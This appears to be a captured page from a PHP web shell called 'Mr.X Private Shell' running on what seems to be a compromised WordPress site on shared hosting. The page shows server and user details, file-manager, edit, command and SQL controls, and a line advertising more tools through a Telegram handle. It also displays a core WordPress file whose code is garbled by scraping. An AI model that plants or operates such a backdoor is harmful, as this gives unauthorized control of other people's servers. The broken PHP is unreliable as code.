Uname: Linux premium227.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: 628 (bubbysqr)
Group: 620 (bubbysqr)
Disabled functions: NONE
Safe mode: On[ PHPinfo ]
//home/bubbysqr/zahinutraceutical.com/wp-includes/customize      ( Reset | Go to )
File Name: class-wp-customize-filter-setting.php
Edit
<?php
/**
 * Customize API: WP_Customize_Filter_Setting class
 *
 * @package WordPress
 * @subpackage Customize
 * @since 4.4.0
 */

/**
 * A setting that is used to filter a value, but will not save the results.
 *
 * Results should be properly handled using another setting or callback.
 *
 * @since 3.4.0
 *
 * @see WP_Customize_Setting
 */
class WP_Customize_Filter_Setting extends WP_Customize_Setting {

    
/**
     * Saves the value of the setting, using the related API.
     *
     * @since 3.4.0
     * @since 7.0.0 Return type updated from void to true for compatibility with base class.
     *
     * @param mixed $value The value to update.
     * @return true Always returns true.
     */
    
public function update$value ) {
        return 
true;
    }
}

All system for education purposes only. For more tools: Telegram @jackleet

Mr.X Private Shell

Logo
-
New File | New Folder
Command
SQL